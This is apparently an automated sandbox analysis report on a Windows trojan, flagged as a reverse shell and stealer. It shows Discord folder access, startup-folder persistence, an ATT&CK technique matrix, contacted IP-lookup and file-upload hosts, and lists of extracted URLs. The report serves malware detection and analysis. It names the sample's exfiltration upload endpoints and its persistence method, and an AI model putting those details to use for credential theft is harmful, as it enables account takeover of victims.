              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File opened: C:\Users\user\AppData\Local\DiscordPTB
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File opened: C:\Users\user\AppData\Local\DiscordDevelopment

              Remote Access Functionality

              Source: Yara match File source: 00000003.00000003.2109058666.00000124EBC34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000003.00000003.2109058666.00000124EBC32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: Built.exe PID: 2760, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: Built.exe PID: 2536, type: MEMORYSTR
              Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI27602\rarreg.key, type: DROPPED
              Source: Yara match File source: 00000019.00000002.3354239060.00000227B8F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\Creal.exe Code function: 5_2_00007FFD8A1F6674 PyFloat_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyObject_CheckBuffer,PyErr_Format,sqlite3_bind_null,PyObject_GetBuffer,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,sqlite3_bind_blob,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyFloat_AsDouble,PyErr_Occurred,sqlite3_bind_double,PyErr_Occurred,sqlite3_bind_int64,5_2_00007FFD8A1F6674
              Source: C:\Users\user\Desktop\Creal.exe Code function: 5_2_00007FFD8A1F49F0 PyEval_SaveThread,sqlite3_bind_parameter_count,PyEval_RestoreThread,PyTuple_Type,sqlite3_bind_parameter_name,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,PyTuple_Pack,PyDict_GetItemRef,_Py_Dealloc,PyObject_GetOptionalAttr,PyObject_GetOptionalAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyType_IsSubtype,PyObject_CheckBuffer,PyObject_GetBuffer,sqlite3_bind_blob,PyBuffer_Release,PyEval_SaveThread,sqlite3_bind_parameter_name,PyEval_RestoreThread,PyMapping_GetOptionalItemString,sqlite3_bind_null,PyFloat_AsDouble,sqlite3_bind_double,PyList_GetItem,PyExc_DeprecationWarning,PyErr_WarnFormat,PyErr_GetRaisedException,sqlite3_db_handle,_PyErr_ChainExceptions1,PyObject_CallOneArg,_Py_Dealloc,PyErr_Occurred,PyErr_Occurred,PyErr_Format,PyObject_CallOneArg,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,PyExc_OverflowError,PyErr_SetString,PySequence_Check,PyTuple_Type,PyErr_GetRaisedException,sqlite3_db_handle,_PyErr_ChainExceptions1,PySequence_Size,PyErr_Format,PyErr_Occurred,PyErr_Format,PyErr_Format,PyErr_SetString,PySequence_GetItem,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,PyExc_LookupError,PyErr_ExceptionMatches,_Py_Dealloc,_Py_Dealloc,PyObject_CallOneArg,_Py_Dealloc,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,_Py_Dealloc,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,5_2_00007FFD8A1F49F0
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 3 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 2 Native API | 12 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 3 Data from Local System | 22 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | Logon Script (Windows) | 11 Process Injection | 21 Obfuscated Files or Information | Security Account Manager | 45 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 12 Registry Run Keys / Startup Folder | 21 Software Packing | NTDS | 131 Security Software Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 41 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph. Behavior Graph ID: 1553259; Sample: #U0416#U0430#U0440#U043a#U0...; Startdate: 10/11/2024; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label | Link
#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | 32% | ReversingLabs | Win64.Trojan.ReverseShell |
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
http://repository.swisssign.com/C | 0% | Avira URL Cloud | safe |
https://en.wikipeT | 0% | Avira URL Cloud | safe |
https://setuptools.pypa.io/en/latest/0 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
api.ipify.org | 104.26.12.205 | true | false | | high
geolocation-db.com | 159.89.102.253 | true | false | | high
ifconfig.me | 34.160.111.145 | true | false | | high
api.gofile.io | 45.112.123.126 | true | false | | high
blank-v1rwt.in | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://ifconfig.me/ | false | | high
                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerBuilt.exe, 00000004.00000002.2161759749.000002D964E11000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2113671751.000002D966818000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2416504882.00000203E702A000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2370381373.00000203E7029000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373805074.00000203E5623000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373550866.00000203E5605000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373218215.00000203E702A000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2378555215.00000203E5629000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2409846250.00000203E5638000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/python/cpython/issues/86361.Built.exe, 00000004.00000003.2139013017.000002D966BF9000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2128966151.000002D9673AA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2128966151.000002D96734F000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2130110803.000002D966C89000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2162686689.000002D966BF9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2156593481.00000203E73D2000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381564698.00000203E70F7000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2371187590.00000203E70E9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2156527653.00000203E781F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://ebay.com)Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://httpbin.org/Built.exe, 00000004.00000002.2162686689.000002D966B30000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2367740897.00000203E79A9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403089079.00000203E79F0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372527708.00000203E79E8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E79BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375579122.00000203E79E9000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372941134.00000203E79DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.apache.org/licenses/Creal.exe, 00000002.00000003.2119357168.0000016B5EEB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainCreal.exe, 00000002.00000003.2118844474.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sBuilt.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleBuilt.exe, 00000004.00000002.2162519466.000002D966A30000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2113671751.000002D966818000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesBuilt.exe, 00000004.00000002.2162519466.000002D966A30000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2113671751.000002D966818000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://playstation.com)Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://img.shields.io/badge/skeleton-2024-informationalCreal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-theCreal.exe, 00000005.00000003.2406764500.00000203E77A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535Built.exe, 00000004.00000003.2140576878.000002D967425000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2164052765.000002D966F30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2167539470.000002D967425000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381479785.00000203E784F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2381601278.00000203E7855000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2369311620.00000203E7810000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2399794322.00000203E7857000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7811000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373069284.00000203E784B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://cryptography.io/en/latest/installation/Creal.exe, 00000002.00000003.2118844474.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://sellix.io)Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://ip-api.com/line/?fields=hostingrBuilt.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://crl.securetrust.com/STCA.crlCreal.exe, 00000005.00000003.2374144942.00000203E77BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2414377242.00000203E77D8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2414506269.00000203E77DD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2408002776.00000203E77D0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2379853971.00000203E77CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0Creal.exe, 00000005.00000003.2377722260.00000203E7B39000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2407470259.00000203E7B44000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://api.anonfiles.com/uploadrBuilt.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://tools.ietf.org/html/rfc6125#section-6.4.3Built.exe, 00000004.00000002.2171255511.000002D967DE4000.00000004.00001000.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.cert.fnmt.es/dpcs/Creal.exe, 00000005.00000003.2377575981.00000203E7B5B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2389785541.00000203E78D0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373660739.00000203E78CF000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375300692.00000203E7B58000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://google.com/mailBuilt.exe, 00000004.00000003.2138293820.000002D9670DB000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2162686689.000002D966B30000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2164052765.000002D9670DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://img.shields.io/pypi/v/importlib_metadata.svgCreal.exe, 00000002.00000003.2128050929.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://github.com/jaraco/jaraco.functools/issues/5Creal.exe, 00000005.00000002.2423537935.00000203E7DC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.accv.es00Creal.exe, 00000005.00000003.2377722260.00000203E7B39000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2407470259.00000203E7B44000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.rfc-editor.org/info/rfc7253Creal.exe, 00000005.00000003.2403845274.00000203E7B81000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2405592368.00000203E7B93000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376890554.00000203E7B7E000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2375135249.00000203E7B6F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://github.com/pyca/cryptography/issuesCreal.exe, 00000002.00000003.2118844474.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.Built.exe, 00000004.00000002.2166572462.000002D967330000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2389785541.00000203E78D7000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373660739.00000203E78CF000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376802757.00000203E78D5000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7811000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2379514476.00000203E78D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://mahler:8092/site-updates.pyCreal.exe, 00000005.00000003.2372707280.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2378468400.00000203E7476000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2163437726.00000203E795D000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2377974542.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374846297.00000203E7459000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2370196877.00000203E7459000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://setuptools.pypa.io/en/latest/0Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://api.gofile.io/getServerrBuilt.exe, 00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://ocsp.sectigo.com0Built.exe, 00000003.00000003.2108830553.00000124EBC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://tools.ietf.org/html/rfc7231#section-4.3.6)Built.exe, 00000004.00000002.2166572462.000002D967330000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372126765.00000203E78E0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2403607439.00000203E78F7000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7811000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://cryptography.io/Creal.exe, 00000002.00000003.2118844474.0000016B5EEB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://discordapp.com/api/v9/users/Built.exe, 00000004.00000002.2163568544.000002D966D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.firmaprofesional.com/cps0Creal.exe, 00000005.00000003.2376930636.00000203E8417000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2378648633.00000203E77F0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2425987536.00000203E8418000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374358999.00000203E77E8000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374144942.00000203E77BD000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2418846015.00000203E77F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specBuilt.exe, 00000004.00000002.2162140742.000002D96676C000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2113671751.000002D966818000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://netflix.com)Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://github.com/urllib3/urllib3/issues/2920Built.exe, 00000004.00000002.2173551673.000002D967E54000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000004.00000002.2162686689.000002D966B30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://gmail.com)Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://crl.securetrust.com/SGCA.crl0Creal.exe, 00000005.00000003.2389785541.00000203E78D7000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373660739.00000203E78CF000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2376802757.00000203E78D5000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2379514476.00000203E78D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataBuilt.exe, 00000004.00000002.2161759749.000002D964E11000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000004.00000003.2113671751.000002D966818000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2406072986.00000203E702F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2370381373.00000203E7029000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372966606.00000203E702C000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000002.2416589166.00000203E7030000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://outlook.com)Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
45.112.123.126 | api.gofile.io | Singapore | 16509 | AMAZON-02US | false
34.160.111.145 | ifconfig.me | United States | 2686 | ATGS-MMD-ASUS | false
159.89.102.253 | geolocation-db.com | United States | 14061 | DIGITALOCEAN-ASNUS | false
                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                            127.0.0.1
                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1553259
                                                                                                                                                                                                                            Start date and time:2024-11-10 17:01:27 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 11m 46s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:30
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
                                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                                            Original Sample Name: .exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.troj.adwa.spyw.evad.winEXE@45/226@6/6
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                            • VT rate limit hit for: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
Time | Type | Description
11:02:19 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
11:02:20 | API Interceptor | 73x Sleep call for process: powershell.exe modified
17:02:28 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            perfcc.elfGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • api.ipify.org/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
